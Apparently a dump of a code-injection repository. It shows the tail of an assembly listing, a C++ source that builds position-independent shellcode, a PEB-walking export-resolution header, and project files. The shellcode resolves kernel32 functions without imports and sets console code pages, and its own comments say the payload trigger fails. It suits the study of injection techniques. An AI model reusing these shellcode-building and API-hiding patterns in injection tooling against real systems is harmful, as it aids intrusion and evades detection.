| mov WORD PTR c2$4[rsp], ax 744 | ; Line 56 745 | movzx eax, WORD PTR c1$3[rsp] 746 | movzx ecx, WORD PTR c2$4[rsp] 747 | cmp eax, ecx 748 | je SHORT $LN13@GetModuleB 749 | jmp SHORT $LN6@GetModuleB 750 | $LN13@GetModuleB: 751 | ; Line 57 752 | jmp 
$LN5@GetModuleB 753 | $LN6@GetModuleB: 754 | ; Line 59 755 | mov rax, QWORD PTR module_name$[rsp] 756 | mov rcx, QWORD PTR i$1[rsp] 757 | movzx eax, WORD PTR [rax+rcx*2] 758 | test eax, eax 759 | jne SHORT $LN14@GetModuleB 760 | mov rax, QWORD PTR curr_name$2[rsp] 761 | mov rcx, QWORD PTR i$1[rsp] 762 | movzx eax, WORD PTR [rax+rcx*2] 763 | test eax, eax 764 | jne SHORT $LN14@GetModuleB 765 | ; Line 60 766 | mov rax, QWORD PTR entry$5[rsp] 767 | mov rax, QWORD PTR [rax+48] 768 | jmp SHORT $LN1@GetModuleB 769 | $LN14@GetModuleB: 770 | ; Line 62 771 | jmp $LN2@GetModuleB 772 | $LN3@GetModuleB: 773 | ; Line 64 774 | xor eax, eax 775 | $LN1@GetModuleB: 776 | ; Line 65 777 | add rsp, 88 ; 00000058H 778 | ret 0 779 | ?GetModuleByName@@YAPEAXPEA_W@Z ENDP ; GetModuleByName 780 | _TEXT ENDS 781 | END 782 | -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.cpp: -------------------------------------------------------------------------------- 1 | // ShellcodeInjection.cpp : Este archivo contiene la función "main". La ejecución del programa comienza y termina ahí. 
//
#include "defs.h"

// Resolves the kernel32 entry points that SpawnPayload calls and stores them in `iat`.
// kernel32's base comes from GetModuleByName (PEB walk, defs.h) and GetProcAddress from
// GetFunctionByName (export-table walk, defs.h); the remaining four pointers are then
// obtained through the resolved GetProcAddress.
// Parameters: iat - table that receives the six function pointers; partially filled if an
//             intermediate lookup fails.
// Returns 0 on success, otherwise a non-zero code naming the first lookup that failed:
// 1 kernel32 not found, 3 GetProcAddress, 4 SetConsoleOutputCP, 5 GetConsoleWindow,
// 6 SetConsoleCP, 7 AllocConsole, 8 SetThreadUILanguage (code 2 is not used).
// Every name is spelled as a char/wchar_t array initialised element by element; presumably
// so the strings are materialised on the stack instead of in a data section, which the build
// notes above main() suggest the final object must not have (TODO confirm).
UINT initializeIatShellcode(kernel32Iat& iat)
{
    wchar_t kernel32_dll_name[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0 };
    // NOTE: GetModuleByName lower-cases this buffer in place (TO_LOWERCASE in defs.h assigns
    // back into its argument); harmless here because the name is already lower case.
    LPVOID baseAddrKernel32 = GetModuleByName(kernel32_dll_name);
    if (!baseAddrKernel32) {
        return 1;
    }
    char get_proc_name[] = { 'G','e','t','P','r','o','c','A','d','d','r','e','s','s',0 };
    LPVOID get_proc = GetFunctionByName((HMODULE)baseAddrKernel32, (LPSTR)get_proc_name);
    if (!get_proc) {
        return 3;
    }
    iat._GetProcAddress = (FARPROC(WINAPI*)(HMODULE, LPCSTR)) get_proc;

    char get_console_window_name[] = { 'G','e','t','C','o','n','s','o','l','e','W','i','n','d','o','w',0 };
    char alloc_console_name[] = { 'A','l','l','o','c','C','o','n','s','o','l','e',0 };
    char set_console_cp_name[] = { 'S','e','t','C','o','n','s','o','l','e','C','P',0 };
    char set_console_output_cp_name[] = { 'S','e','t','C','o','n','s','o','l','e','O','u','t','p','u','t','C','P',0 };
    char set_Thread_UI_language_Name[] = { 'S','e','t','T', 'h', 'r','e','a','d', 'U','I', 'L', 'a','n','g','u','a','g','e', 0 };

    // From here on the lookups go through the real GetProcAddress, so each result is
    // whatever kernel32 reports for that name (NULL when the export is absent).
    iat._SetConsoleOutputCP = (BOOL(WINAPI * )(UINT))iat._GetProcAddress((HMODULE)baseAddrKernel32, set_console_output_cp_name);
    if (!iat._SetConsoleOutputCP) {
        return 4;
    }
    iat._GetConsoleWindow = (HWND(WINAPI * )()) iat._GetProcAddress((HMODULE)baseAddrKernel32, get_console_window_name);
    if (!iat._GetConsoleWindow) {
        return 5;
    }
    iat._SetConsoleCP = (BOOL(WINAPI * )(UINT))iat._GetProcAddress((HMODULE)baseAddrKernel32, set_console_cp_name);
    if (!iat._SetConsoleCP) {
        return 6;
    }
    iat._AllocConsole = (BOOL(WINAPI* )()) iat._GetProcAddress((HMODULE)baseAddrKernel32, alloc_console_name);
    if (!iat._AllocConsole) {
        return 7;
    }
    iat._SetThreadUILanguage = (LANGID(WINAPI *)(LANGID))iat._GetProcAddress((HMODULE)baseAddrKernel32, set_Thread_UI_language_Name);
    if (!iat._SetThreadUILanguage) {
        return 8;
    }
    return 0;
}

//Fix this payload trigger, it fails!
// Applies the code page: ensures the process has a console window (allocating one when
// GetConsoleWindow returns NULL), then sets the console output and input code pages to
// *dwCodePageId and finally the thread UI language to 0.
// Parameters: dwCodePageId - pointer to the code-page id to apply; it is dereferenced
//             without a NULL check. iat - table filled by initializeIatShellcode.
// Returns nothing. Any call that reports failure ends the sequence early; the return value of
// _SetThreadUILanguage is discarded.
void SpawnPayload(DWORD* dwCodePageId, kernel32Iat& iat)
{
    DWORD dwCodePageID = *dwCodePageId;
    if (!iat._GetConsoleWindow())
    {
        if (!iat._AllocConsole()) {
            return;
        }
    }
    //Shellcode fails here.
    if (!iat._SetConsoleOutputCP(dwCodePageID)){
        return;
    }
    if (!iat._SetConsoleCP(dwCodePageID)){
        return;
    }
    iat._SetThreadUILanguage(0);
}

//cl /c /FA /GS- ShellcodeInjection.cpp
//Delete xdata and pdata, comment INCLUDELIB LIBCMT and INCLUDELIB OLDNAMES
//ml64 /c ShellcodeInjection.asm /link /entry:AlignRSP

// Entry point with a non-standard signature: the single argument is the code-page pointer
// handed straight to SpawnPayload (presumably supplied by the AlignRSP stub named in the
// build notes above — not visible here). The function table lives on this frame; nothing
// references the global `iat_kernel32` declared in defs.h.
// Returns 1 when initializeIatShellcode fails (its specific code is dropped), otherwise 0.
int main(DWORD* dwCodeID)
{
    kernel32Iat iat;
    if (initializeIatShellcode(iat)) {
        return 1;
    }
    SpawnPayload(dwCodeID, iat);

    return 0;
}
 -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/ShellcodeInjection.obj -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {4225c8d1-e331-4436-ba0c-4f8051b8cbdf} 25 | ShellcodeInjection 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 |
Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Archivos de origen 20 | 21 | 22 | 23 | 24 | Archivos de encabezado 25 | 26 | 27 | -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ShellcodeInjection/all sections/shellcode.bin: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/all sections/shellcode.bin -------------------------------------------------------------------------------- /ShellcodeInjection/defs.h: --------------------------------------------------------------------------------
#pragma once
// NOTE(review): the header names after the two #include directives below are missing from
// this copy of the file.
#include
#define RTL_MAX_DRIVE_LETTERS 32
#include
//Header based on https://github.com/hasherezade/masm_shc/blob/master/demos/peb_lookup.h

// ASCII-only lower-casing used by GetModuleByName.
// NOTE(review): the middle operand of the conditional is itself an assignment
// (`c1 = (c1 - 'A') + 'a'`), so the macro writes the lower-cased value back into its second
// argument as well as into `out`. Both call sites below pass array elements, and those arrays
// are therefore modified in place.
#ifndef TO_LOWERCASE
#define TO_LOWERCASE(out, c1) (out = (c1 <= 'Z' && c1 >= 'A') ? c1 = (c1 - 'A') + 'a': c1)
#endif

// enhanced version of LDR_DATA_TABLE_ENTRY: a local definition of the loader's module entry
// with the fields this header reads (DllBase, BaseDllName) spelled out by name.
typedef struct _LDR_DATA_TABLE_ENTRY1 {
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    void* DllBase;
    void* EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG Flags;
    SHORT LoadCount;
    SHORT TlsIndex;
    HANDLE SectionHandle;
    ULONG CheckSum;
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY1, * PLDR_DATA_TABLE_ENTRY1;

// Returns the DllBase of the loaded module whose BaseDllName equals `module_name`, comparing
// ASCII letters case-insensitively, or NULL when no entry matches. The list is
// PEB->Ldr->InMemoryOrderModuleList; the PEB pointer is read from the TEB (gs:[0x60] on x64,
// fs:[0x30] on x86).
// Parameters: module_name - NUL-terminated wide string. It is not treated as read-only: each
//             character compared is lower-cased in place by TO_LOWERCASE.
// Side effect: the same in-place lower-casing is applied to entry->BaseDllName.Buffer, i.e.
// the loader's own module-name strings are rewritten while searching. Nothing restores them,
// so the change persists after the call and is visible to anything that later reads the PEB.
inline LPVOID GetModuleByName(WCHAR* module_name)
{
    PEB* peb;
#if defined(_WIN64)
    peb = (PPEB)__readgsqword(0x60);
#else
    peb = (PPEB)__readfsdword(0x30);
#endif
    PEB_LDR_DATA* ldr = peb->Ldr;

    LIST_ENTRY* head = &ldr->InMemoryOrderModuleList;
    for (LIST_ENTRY* current = head->Flink; current != head; current = current->Flink) {
        LDR_DATA_TABLE_ENTRY1* entry = CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY1, InMemoryOrderLinks);
        // An entry with a NULL DllBase ends the walk (break, not continue).
        if (!entry || !entry->DllBase) break;

        WCHAR* curr_name = entry->BaseDllName.Buffer;
        if (!curr_name) continue;

        size_t i;
        // UNICODE_STRING.Length is a byte count, so this bound permits twice as many
        // iterations as there are characters; the NUL test below is what normally ends the
        // loop, which relies on both buffers being NUL-terminated.
        for (i = 0; i < entry->BaseDllName.Length; i++) {
            // if any of the strings finished:
            if (module_name[i] == 0 || curr_name[i] == 0) {
                break;
            }
            WCHAR c1, c2;
            TO_LOWERCASE(c1, module_name[i]);  // also rewrites module_name[i]
            TO_LOWERCASE(c2, curr_name[i]);    // also rewrites the loader's BaseDllName buffer
            if (c1 != c2) break;
        }
        // both of the strings finished, and so far they were identical:
        if (module_name[i] == 0 && curr_name[i] == 0) {
            return entry->DllBase;
        }
    }

    return NULL;
}

// Looks up an export of `module` by name without calling GetProcAddress: it reads the image's
// export directory, compares `func_name` byte-for-byte (case-sensitive) with each entry of
// AddressOfNames, and returns module + AddressOfFunctions[AddressOfNameOrdinals[i]].
// Parameters: module - base address of a loaded PE image; func_name - NUL-terminated name.
// Returns the export's address, or NULL when e_magic is not IMAGE_DOS_SIGNATURE, the export
// data directory has no VirtualAddress, or no name matches.
// NOTE(review): the IMAGE_NT_HEADERS Signature is not verified and none of the RVAs taken
// from the image are range-checked, so a malformed image is dereferenced blindly. A forwarded
// export (RVA inside the export directory) would be returned as the address of the forwarder
// string rather than resolved.
inline LPVOID GetFunctionByName(LPVOID module, char* func_name)
{
    IMAGE_DOS_HEADER* idh = (IMAGE_DOS_HEADER*)module;
    if (idh->e_magic != IMAGE_DOS_SIGNATURE) {
        return NULL;
    }
    IMAGE_NT_HEADERS* nt_headers = (IMAGE_NT_HEADERS*)((BYTE*)module + idh->e_lfanew);
    IMAGE_DATA_DIRECTORY* exportsDir = &(nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
    if (!exportsDir->VirtualAddress) {
        return NULL;
    }

    DWORD expAddr = exportsDir->VirtualAddress;
    IMAGE_EXPORT_DIRECTORY* exp = (IMAGE_EXPORT_DIRECTORY*)(expAddr + (ULONG_PTR)module);
    SIZE_T namesCount = exp->NumberOfNames;

    DWORD funcsListRVA = exp->AddressOfFunctions;
    DWORD funcNamesListRVA = exp->AddressOfNames;
    DWORD namesOrdsListRVA = exp->AddressOfNameOrdinals;

    //go through names:
    for (SIZE_T i = 0; i < namesCount; i++) {
        // The three parallel tables: name RVA (DWORD), ordinal index (WORD), and the
        // function RVA selected by that index (DWORD).
        DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*)module + i * sizeof(DWORD));
        WORD* nameIndex = (WORD*)(namesOrdsListRVA + (BYTE*)module + i * sizeof(WORD));
        DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*)module + (*nameIndex) * sizeof(DWORD));

        LPSTR curr_name = (LPSTR)(*nameRVA + (BYTE*)module);
        size_t k;
        // Manual strcmp: stop at the first difference or at either terminator.
        for (k = 0; func_name[k] != 0 && curr_name[k] != 0; k++) {
            if (func_name[k] != curr_name[k]) break;
        }
        if (func_name[k] == 0 && curr_name[k] == 0) {
            //found
            return (BYTE*)module + (*funcRVA);
        }
    }
    return NULL;
}

// Table of kernel32 entry points resolved at run time (filled by initializeIatShellcode in
// ShellcodeInjection.cpp, whose main() keeps its own local instance).
// NOTE(review): the declarators after the closing brace define two global variables in this
// header — an object `iat_kernel32` and a pointer `piat_struct32` (no typedef, so
// `piat_struct32` is a variable, not a type). Neither is referenced by ShellcodeInjection.cpp,
// and including defs.h from more than one translation unit would define them twice.
struct kernel32Iat {
    BOOL(WINAPI* _SetConsoleOutputCP)(UINT wCodePageID);
    HWND(WINAPI* _GetConsoleWindow)();
    BOOL(WINAPI* _SetConsoleCP)(UINT wCodePageID);
    BOOL(WINAPI* _AllocConsole)();
    LANGID(WINAPI* _SetThreadUILanguage)(LANGID LangId);
    FARPROC(WINAPI* _GetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
}iat_kernel32, * piat_struct32;
 -------------------------------------------------------------------------------- /ShellcodeInjection/mllink$.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/mllink$.lnk -------------------------------------------------------------------------------- /ShellcodeInjection/x64/Release/ShellcodeInjection.Build.CppClean.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/x64/Release/ShellcodeInjection.Build.CppClean.log -------------------------------------------------------------------------------- /ShellcodeInjection/x64/Release/ShellcodeInjection.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\USER\source\repos\NLSRegistryCodeInjection\x64\Release\ShellcodeInjection.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /ShellcodeInjection/x64/Release/ShellcodeInjection.log: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /ShellcodeInjection/x64/Release/ShellcodeInjection.vcxproj.FileListAbsolute.txt: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/ShellcodeInjection/x64/Release/ShellcodeInjection.vcxproj.FileListAbsolute.txt --------------------------------------------------------------------------------